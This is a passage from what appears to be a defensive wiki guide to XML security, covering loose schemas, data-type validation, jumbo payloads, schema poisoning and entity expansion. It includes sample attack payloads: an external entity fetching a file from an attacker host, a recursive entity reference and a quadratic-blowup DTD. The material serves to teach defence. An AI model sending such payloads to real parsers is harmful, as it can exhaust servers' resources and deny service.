  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
